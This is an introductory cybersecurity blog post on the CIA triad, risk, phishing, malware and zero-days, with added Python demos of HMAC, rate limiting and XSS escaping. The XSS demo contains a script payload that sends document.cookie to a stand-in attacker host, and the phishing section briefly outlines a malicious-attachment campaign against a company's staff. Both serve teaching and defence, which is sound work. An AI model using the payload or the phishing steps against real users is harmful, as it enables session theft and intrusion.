I have been talking to a lot of aspiring cybersecurity professionals and they are all doing the same thing: learning, learning, learning, getting a cert, and the cycle repeats. Certs get you an interview but your skills get you the job, so when you are trying to learn something new, focus on understanding it instead of just memorizing it. I also found that many people can't share their knowledge or explain concepts and techniques in an effective, understandable way. In this post, I will try to explain some of the basic concepts from a different perspective to help you understand the cyber world better!

CIA triad

  • Confidentiality – Maintaining confidentiality means that information is never disclosed to unauthorized individuals. 
  • Integrity – This refers to making sure your data remains accurate and unchanged. 
  • Availability – This means that the system is available to authorized entities without disruptions 

Confidentiality: how do I know that a message came from a trusted person and not from an attacker, and how do I make sure only that person can read what I send back? By authenticating. How do we authenticate people? By something they know (passwords, passphrases), something they have (a phone with a 2FA app, an RFID badge) or something they are (biometric data such as a fingerprint or retina scan). In the cyber world, the building blocks are certificates, asymmetric encryption, tokens, etc.

Cookie stealing, RFID cloning and traffic sniffing are all attacks aimed at breaking confidentiality.

Integrity guarantees that the data has not been modified (manipulated, truncated, replaced) in any way between the moment of sending and the moment of receiving. Encryption alone does not give you this: an attacker who cannot read the ciphertext can still flip bits in it. What provides integrity are cryptographic hashes combined with a secret, i.e. message authentication codes (MACs), and digital signatures. In practice we get it from TLS (what people still call SSL), which bundles encryption with a MAC or an AEAD cipher, and we put everything over it: HTTPS, SMTPS, FTPS. SFTP gets the same guarantee from SSH rather than TLS.
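To make the difference between "has a checksum" and "has integrity" concrete, here is an added example (not from the original post). It pits an active attacker on the wire against two receivers: one that trusts a plain SHA-256 digest appended to the message, and one that requires an HMAC-SHA256 tag computed with a shared key. The key, the order text and the attacker's edit are all constructed for the demo.

```python
import hashlib
import hmac

TAG_LEN = 32  # SHA-256 output size in bytes

# Constructed for this example: a key the sender and receiver agreed on beforehand.
# In a real protocol this comes from a key exchange or a provisioning step.
SHARED_KEY = b"demo-shared-key-do-not-reuse"


def unkeyed_send(message: bytes) -> bytes:
    """Naive 'integrity': append a plain SHA-256 digest. Wire format: message || digest."""
    return message + hashlib.sha256(message).digest()


def unkeyed_receive(packet: bytes):
    """Accepts any packet whose digest matches its message, which anyone can produce."""
    if len(packet) < TAG_LEN:
        return None
    message, digest = packet[:-TAG_LEN], packet[-TAG_LEN:]
    if hashlib.sha256(message).digest() != digest:
        return None
    return message


def attacker_rewrite_unkeyed(packet: bytes, old: bytes, new: bytes) -> bytes:
    """Active attacker on the wire: edit the message and simply recompute the digest.
    No secret is needed, so the receiver cannot tell this from a genuine packet."""
    message = packet[:-TAG_LEN].replace(old, new)
    return unkeyed_send(message)


def mac_send(message: bytes, key: bytes = SHARED_KEY) -> bytes:
    """Keyed integrity: append HMAC-SHA256 over the message. Wire format: message || tag."""
    return message + hmac.new(key, message, hashlib.sha256).digest()


def mac_receive(packet: bytes, key: bytes = SHARED_KEY):
    """Returns the message if the tag verifies, None if it was modified or truncated.
    compare_digest avoids leaking the position of the first mismatching byte via timing."""
    if len(packet) < TAG_LEN:
        return None
    message, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    expected = hmac.new(key, message, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return message


def attacker_rewrite_mac(packet: bytes, old: bytes, new: bytes) -> bytes:
    """Same attacker against the MAC scheme: can edit the message bytes but cannot
    recompute the tag without the key, so the old tag has to be left in place."""
    message, tag = packet[:-TAG_LEN], packet[-TAG_LEN:]
    return message.replace(old, new) + tag


def demo():
    order = b"transfer 100 EUR to account 42"
    # Unkeyed hash: the rewritten order is accepted as genuine.
    hashed = unkeyed_receive(attacker_rewrite_unkeyed(unkeyed_send(order), b"100", b"900"))
    # HMAC: the untouched order is accepted, the rewritten one is rejected.
    genuine = mac_receive(mac_send(order))
    forged = mac_receive(attacker_rewrite_mac(mac_send(order), b"100", b"900"))
    return hashed, genuine, forged


if __name__ == "__main__":
    print(demo())
```

Two things to take away: a digest only protects against accidental corruption, because anyone who can change the bytes can also change the digest; and verification must fail closed (return None, never the message) on truncation or a bad tag. TLS does the equivalent per record, which is what makes "put it over TLS" an integrity control and not just a confidentiality one.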

Something I have seen plenty of times is devs leaving the PUT and DELETE methods enabled on their web servers. If these methods are not restricted, an attacker can delete content from the server or compromise it by uploading a web shell and executing it. A solution can also become an attack: we encrypt our data to defeat sniffing, but ransomware also encrypts my disk and asks for Bitcoin.

In the cyber world, everything has a solution and a counter for it. It's a never-ending, ever-changing world.

Getting back on track, data always has to be available. Imagine that you can't watch a YouTube video because the data centre just burnt down, or visit a website because the web server has been hit by ransomware. The best example of attacking availability is a Denial of Service attack: when we bombard a service such as a web server or a file server with an enormous number of requests, regular users experience slowness or a total denial of the service.

The industry doesn't have a complete solution for this. In cloud environments you can scale up resources to absorb the load. You can also build a fail-safe system with two or more servers so that if one goes down another keeps serving. And you can rate-limit or filter abusive clients at the edge so that a single source cannot consume all of your capacity, although a distributed attack coming from many addresses makes that much harder.
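As an added example (not part of the original post), here is the kind of per-client rate limiting that sits in front of a service to keep one flooding source from starving everyone else. It is a token bucket keyed by source IP, replayed over a constructed request log; the addresses come from the RFC 5737 documentation ranges and the capacity and refill rate are arbitrary choices for the demo.

```python
from collections import defaultdict


class TokenBucket:
    """One client's budget: up to `capacity` requests in a burst, refilled at `rate`
    requests per second. Each request spends one token; an empty bucket means reject."""

    def __init__(self, capacity: int, rate: float):
        self.capacity = capacity
        self.rate = rate
        self.tokens = float(capacity)
        self.last = None  # timestamp of the previous request, None until first seen

    def allow(self, now: float) -> bool:
        if self.last is not None:
            # Refill proportionally to the time elapsed, never above capacity.
            self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False


class RateLimiter:
    """Per-source-IP buckets: a flooding client drains its own bucket within a fraction
    of a second while every other client keeps its full budget."""

    def __init__(self, capacity: int = 5, rate: float = 1.0):
        self.buckets = defaultdict(lambda: TokenBucket(capacity, rate))

    def check(self, client_ip: str, now: float) -> bool:
        return self.buckets[client_ip].allow(now)


def simulate(requests, capacity: int = 5, rate: float = 1.0):
    """Replay (timestamp, client_ip) pairs in time order; return per-IP allowed and
    rejected counts so the effect on each client can be inspected."""
    limiter = RateLimiter(capacity, rate)
    allowed, rejected = defaultdict(int), defaultdict(int)
    for now, ip in sorted(requests):
        if limiter.check(ip, now):
            allowed[ip] += 1
        else:
            rejected[ip] += 1
    return dict(allowed), dict(rejected)


# Constructed traffic sample: one source fires 20 requests within 0.2 s,
# a normal user makes one request per second.
FLOOD_IP = "203.0.113.5"
USER_IP = "198.51.100.7"
SAMPLE_REQUESTS = [(i * 0.01, FLOOD_IP) for i in range(20)] + [
    (0.5, USER_IP),
    (1.5, USER_IP),
    (2.5, USER_IP),
]


if __name__ == "__main__":
    print(simulate(SAMPLE_REQUESTS))
```

With a capacity of 5 and a refill of 1 token/second, the flooding address gets its first 5 requests through and the remaining 15 are rejected, while the normal user is never touched. The limitation is exactly the one noted above: a distributed attack spreads the requests over thousands of addresses, each of which stays under its own limit, which is why per-source limiting has to be combined with capacity and redundancy rather than replace them.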

Let’s see some more things!

Threat: someone or something with the potential to cause harm by damaging or destroying the data of a system or organization. Threats are anything (an object, a substance, a human, etc.) capable of acting against an asset in a manner that can result in harm. A tornado is a threat, as is a flood, as is a hacker. The key consideration is that threats apply a force (water, wind, exploit code, etc.) against an asset, and that force can cause a loss event to occur. Threats relevant to companies include APTs, hacktivists, cyber terrorists, etc. Nowadays the hacker living in the basement is an outdated and mostly harmless concept.

Risk: This is one of the most important concepts, if not the most important one, because management, clients and investors usually understand risk. Risk can be your common language for getting your message across and a great way to approach people in higher ranks.

Risk is a combination of threat likelihood and impact (loss). In simple terms, it is the potential damage or loss when a threat exploits a vulnerability. For example, you found a Stored XSS bug in the comment section of a web application. What could happen? An attacker can plant a script that steals the cookies of every user who views the comment, impersonate them with the stolen sessions, or sell their data on the dark web. If this happens, which is likely if we are speaking about a well-known site, the company loses customers, reputation and, more importantly, money.
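To show both halves of that risk, here is an added example (not from the original post) of the comment rendering that makes the Stored XSS possible, its output-encoded counterpart, and the cookie attributes that shrink the impact even when a script does get through. The payload and the collection host attacker.example are constructed for the demo.

```python
import html

# Constructed attacker comment: the classic cookie-theft payload, pointed at a
# hypothetical collection host.
PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'


def render_comment_vulnerable(author: str, body: str) -> str:
    """Stored XSS: user-controlled text is interpolated straight into the page, so the
    browser of every visitor who loads this comment executes the attacker's script."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author: str, body: str) -> str:
    """Output encoding: <, >, &, " and ' become entities, so the payload is displayed
    as text instead of being parsed as markup."""
    return f'<div class="comment"><b>{html.escape(author)}</b>: {html.escape(body)}</div>'


def session_cookie(session_id: str, hardened: bool = True) -> str:
    """Set-Cookie value for the session. HttpOnly hides it from document.cookie (so the
    payload above harvests nothing), Secure keeps it off plaintext HTTP, and SameSite
    limits cross-site sends. Without the flags the stolen cookie is a ready-made login."""
    attrs = "; HttpOnly; Secure; SameSite=Lax" if hardened else ""
    return f"session={session_id}; Path=/{attrs}"


if __name__ == "__main__":
    print(render_comment_vulnerable("mallory", PAYLOAD))
    print(render_comment_safe("mallory", PAYLOAD))
    print(session_cookie("3f9a...", hardened=False))
    print(session_cookie("3f9a..."))
```

The likelihood side of the risk is reduced by escaping on output (or by a templating engine that does it by default); the impact side is reduced by HttpOnly, which is why a finding on a site that sets neither rates higher than the same bug on a site that at least protects its session cookie.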

Vulnerability: a weakness in a system that makes a threat outcome more likely and more damaging. By exploiting vulnerabilities, adversaries can compromise devices or degrade their service (for example using a buffer overflow to crash a firewall). There are multiple ways to find vulnerabilities: reverse engineering, fuzzing a program, or just searching for already known ones on Google.

Some vulnerability databases are:
https://nvd.nist.gov/
https://cve.mitre.org/
and my favorite https://www.exploit-db.com/

Phishing: a malicious attempt to pose as a trusted entity in electronic communication in order to obtain sensitive information such as usernames and passwords through fraudulent messages and emails. Phishing is a common way to gain initial access to a system: look up the company's employees on LinkedIn and you will very likely find a promotion or announcement that shows their email template. Craft an email in that style with a malicious attachment named something like newpremiums.pdf, send it to every employee of the company, and connections will be popping up on your C2 server like fireworks.

The counter for this is security awareness training for your users, plus a firewall, AV with network protection and UEBA, because nothing works 100% of the time.

Malware: any malicious software, such as worms, ransomware, spyware, adware, trojans, keyloggers and many, many more. Malware gets into a network through a vulnerability or through the user: when the user clicks a dangerous link, opens an email attachment or plugs in an infected pendrive. One of the most common types is ransomware (for example WannaCry, Mamba, CryptoWare): it encrypts your files and offers the decryption key in exchange for a Bitcoin payment to its creators.

To counter malware you should educate your users not to click suspicious links and not to download everything from questionable sources. Also use a firewall and AV, and keep operating systems and software up to date. If you care about ransomware, investing in a sandbox solution can be beneficial. A sandbox creates an isolated environment in which a suspicious file is executed and its behaviour observed. If it deletes, overwrites or encrypts files, it is blocked and the sandbox's database is updated with the new indicator. Because this relies on behaviour rather than a known signature, it also helps against zero-days. Offline, tested backups remain the last line of defence when ransomware does get through.

Zero-day exploit: an exploit for a newly discovered vulnerability that has no patch yet. For example, at the time of writing the Follina vulnerability (CVE-2022-30190) had no patch; the only counter was Microsoft's workaround of deleting the ms-msdt URL protocol handler key from the registry (Microsoft later shipped a fix in the June 2022 security updates). You can find zero-day vulnerabilities by fuzzing or reverse engineering software.

You can counter zero-days with sandbox solutions: these products analyse the behaviour of a program rather than looking for signatures like classic AVs. If a program starts behaving maliciously it is quarantined immediately. Having an Incident Response plan does not prevent these attacks, but it is the best way to limit the damage when one gets through.

Data leakage: this is a fun one, an interviewer just asked me about it the other day :D. Data leakage is the unauthorized transmission of data from inside an organization to an external destination or unauthorized party. The data can leave physically or electronically, usually via the web, email and removable storage devices. Leaks can be accidental, malicious, or the result of using the wrong medium (some channels send data across the Internet without proper encryption).

Common types of cybersecurity attacks in 2022:

Malware
Phishing
Cross-Site Scripting
SQL injection
Watering Hole attack
Zero-day exploit
Denial of Service
Use of valid (stolen or bought) credentials
Insider Threat